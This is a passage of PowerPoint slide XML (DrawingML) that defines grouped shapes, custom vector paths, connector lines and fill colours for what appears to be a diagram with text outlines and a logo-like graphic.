                    <a:pt x="102285" y="26009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102285" y="29413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83604" y="29413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83870" y="26073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84861" y="23507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88252" y="19799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90601" y="18872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96291" y="18872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98450" y="19773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100063" y="21678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101498" y="23406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102285" y="26009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102285" y="16624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101574" y="15798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98031" y="14274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88773" y="14274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84988" y="16002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79286" y="22809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77876" y="27393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77876" y="38874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79375" y="43332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82562" y="46621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85509" y="49720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89687" y="51308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97332" y="51308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99364" y="51130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102743" y="50457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104609" y="49847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106565" y="49009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106565" y="46621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106565" y="44221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102806" y="45834"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98996" y="46621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91490" y="46621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88646" y="45554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84607" y="41160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83553" y="37960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83502" y="33782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108127" y="33782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108127" y="29413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108127" y="25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0661" y="565937"/>
              <a:ext cx="236206" cy="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628756" y="1672700"/>
            <a:ext cx="1778635" cy="333375"/>
            <a:chOff x="2628756" y="1672700"/>
            <a:chExt cx="1778635" cy="333375"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="object 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3493731" y="1675371"/>
              <a:ext cx="635" cy="154305"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="635" h="154305">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="330" y="154076"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="53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28756" y="1829355"/>
              <a:ext cx="1778579" cy="1762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38148" y="291871"/>
            <a:ext cx="4002404" cy="2884170"/>
            <a:chOff x="238148" y="291871"/>
            <a:chExt cx="4002404" cy="2884170"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="object 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2736926" y="2179442"/>
              <a:ext cx="473709" cy="83185"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="473710" h="83185">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="46957" y="20209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85720" y="34764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123070" y="46495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160532" y="55798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199638" y="63071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241914" y="68709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288888" y="73109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342091" y="76669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="403049" y="79784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="473291" y="82852"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="53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88586" y="2294747"/>
              <a:ext cx="1655731" cy="7157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91632" y="2538285"/>
              <a:ext cx="395226" cy="63023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4039" y="620395"/>
              <a:ext cx="1256665" cy="782320"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1256664" h="782319">
                  <a:moveTo>
                    <a:pt x="1256416" y="781951"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1225948" y="736238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1195690" y="691748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1165565" y="648495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1135495" y="606496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1105401" y="565766"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1075207" y="526318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1044835" y="488168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1014206" y="451331"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="983243" y="415822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="951868" y="381656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="920003" y="348847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="887571" y="317411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="854494" y="287363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="820694" y="258718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="786093" y="231490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="750613" y="205695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="714178" y="181347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676708" y="158462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="638126" y="137054"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="598355" y="117139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557316" y="98731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="514932" y="81845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="471126" y="66496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425818" y="52699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="378932" y="40470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="330390" y="29823"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280114" y="20772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228026" y="13334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174048" y="7523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118103" y="3353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60113" y="840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="53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0818" y="812609"/>
              <a:ext cx="50165" cy="430530"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="50164" h="430530">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="430098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49891" y="430098"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="53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0818" y="908735"/>
              <a:ext cx="50165" cy="1376045"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="50164" h="1376045">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1375804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49891" y="1375804"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="53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0818" y="898067"/>
              <a:ext cx="50165" cy="1697355"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="50164" h="1697355">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1696972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49891" y="1696972"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="53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0818" y="698042"/>
              <a:ext cx="50165" cy="2239010"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="50164" h="2239010">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="2238489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49891" y="2238489"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="53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8148" y="1536328"/>
              <a:ext cx="1032642" cy="61422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8040" y="2187929"/>
              <a:ext cx="833208" cy="30444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8148" y="809938"/>
              <a:ext cx="1150152" cy="6838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8040" y="2529753"/>
              <a:ext cx="1227166" cy="30445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8040" y="2871611"/>
              <a:ext cx="1185727" cy="30441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77006" y="291871"/>
              <a:ext cx="310083" cy="513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28541" y="380501"/>
              <a:ext cx="1711911" cy="105966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38172" y="1435569"/>
              <a:ext cx="841375" cy="849630"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="841375" h="849630">
                  <a:moveTo>
                    <a:pt x="786676" y="30353"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="735812" y="50"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735812" y="59905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="786676" y="30353"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="841375" h="849630">
                  <a:moveTo>
                    <a:pt x="840994" y="121285"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="840422" y="60896"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="838835" y="59905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="829462" y="54038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="811276" y="43776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="786701" y="30378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735838" y="59905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="682777" y="30200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="630389" y="60756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="618337" y="67729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="526757" y="121767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="526757" y="178930"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="473189" y="318528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="473189" y="394322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="435584" y="416255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420624" y="455396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="315175" y="181876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="315201" y="121894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105054" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114" y="60756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="122542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65468" y="280200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105232" y="303644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105270" y="375539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="262966" y="758558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420560" y="848766"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420560" y="849287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="577964" y="758190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="703008" y="455396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="840994" y="121285"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="318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89976" y="1526501"/>
              <a:ext cx="368935" cy="546100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="368935" h="546100">
                  <a:moveTo>
                    <a:pt x="53543" y="30695"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="60858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53543" y="30695"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="368935" h="546100">
                  <a:moveTo>
                    <a:pt x="368820" y="364477"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="263372" y="90944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263398" y="30962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158115" y="91236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163182" y="150698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="315163" y="545541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368604" y="515162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368820" y="364477"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="61A5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89976" y="1557197"/>
              <a:ext cx="53975" cy="61594"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="53975" h="61594">
                  <a:moveTo>
                    <a:pt x="53543" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="30162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53517" y="61214"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53543" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="EAE9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58580" y="1557337"/>
              <a:ext cx="210185" cy="514984"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="210185" h="514985">
                  <a:moveTo>
                    <a:pt x="106349" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="106349" y="57162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52781" y="196761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52781" y="272554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15176" y="294487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215" y="333629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="484327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52717" y="514464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111391" y="367118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156578" y="394004"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156578" y="252793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171005" y="218694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209499" y="241223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209499" y="181533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157111" y="151104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209791" y="120535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157988" y="90678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157835" y="30022"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106349" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="318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57857" y="1496466"/>
              <a:ext cx="421640" cy="758190"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="421639" h="758189">
                  <a:moveTo>
                    <a:pt x="420738" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="263093" y="90893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263093" y="212102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210223" y="242404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210223" y="302094"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171729" y="279565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157302" y="313664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157302" y="454583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84074" y="497649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53441" y="575335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="606869"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53047" y="637438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52755" y="758184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158280" y="697288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421309" y="60388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420738" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="61A5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47786" y="1647571"/>
              <a:ext cx="105333" cy="9041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95678" y="1829092"/>
              <a:ext cx="105829" cy="9244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00770" y="2072487"/>
              <a:ext cx="53340" cy="62230"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="53339" h="62230">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="61760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53263" y="30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A5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05329" y="2161908"/>
              <a:ext cx="105283" cy="12293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05139" y="2041664"/>
              <a:ext cx="106680" cy="62230"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="106680" h="62230">
                  <a:moveTo>
                    <a:pt x="53441" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="30378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52717" y="61671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106159" y="30137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53441" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="EAE9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15692" y="1557629"/>
              <a:ext cx="105257" cy="18124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73985" y="1435620"/>
              <a:ext cx="51435" cy="60325"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="51435" h="60325">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="59855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50863" y="30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8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38287" y="1435569"/>
              <a:ext cx="840740" cy="182245"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="840739" h="182244">
                  <a:moveTo>
                    <a:pt x="315087" y="121894"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="104940" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="60756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209804" y="182168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="315087" y="121894"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="840739" h="182244">
                  <a:moveTo>
                    <a:pt x="840308" y="60896"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="839012" y="59905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="836053" y="57632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="829030" y="53365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="814222" y="45237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="786587" y="30378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735723" y="59905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="682663" y="30200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="601865" y="77190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="526643" y="121767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="578129" y="151790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="630478" y="122059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="682663" y="151790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="734225" y="122059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="840308" y="60896"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="EAE9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370188" y="1526984"/>
              <a:ext cx="155575" cy="363220"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="155575" h="363219">
                  <a:moveTo>
                    <a:pt x="51041" y="303898"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="333197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51041" y="362635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51041" y="303898"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="155575" h="363219">
                  <a:moveTo>
                    <a:pt x="155486" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="104190" y="29591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155486" y="58966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155486" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="318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63559" y="2102916"/>
              <a:ext cx="53340" cy="60960"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="53339" h="60960">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="60871"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53149" y="30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9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63559" y="2072665"/>
              <a:ext cx="53975" cy="60960"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="53975" h="60960">
                  <a:moveTo>
                    <a:pt x="52832" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="30251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53479" y="60350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52832" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="318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52231" y="2325820"/>
              <a:ext cx="814069" cy="135255"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="814069" h="135255">
                  <a:moveTo>
                    <a:pt x="16332" y="1983"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43268" y="132952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66090" y="132952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70966" y="118193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54686" y="118193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16332" y="1983"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="814069" h="135255">
                  <a:moveTo>
                    <a:pt x="174637" y="1983"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="151841" y="1983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107581" y="132952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124688" y="132952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135305" y="101475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208259" y="101475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203280" y="86741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139839" y="86741"/>
                  </a:lnTo>
                  <a:lnTo>
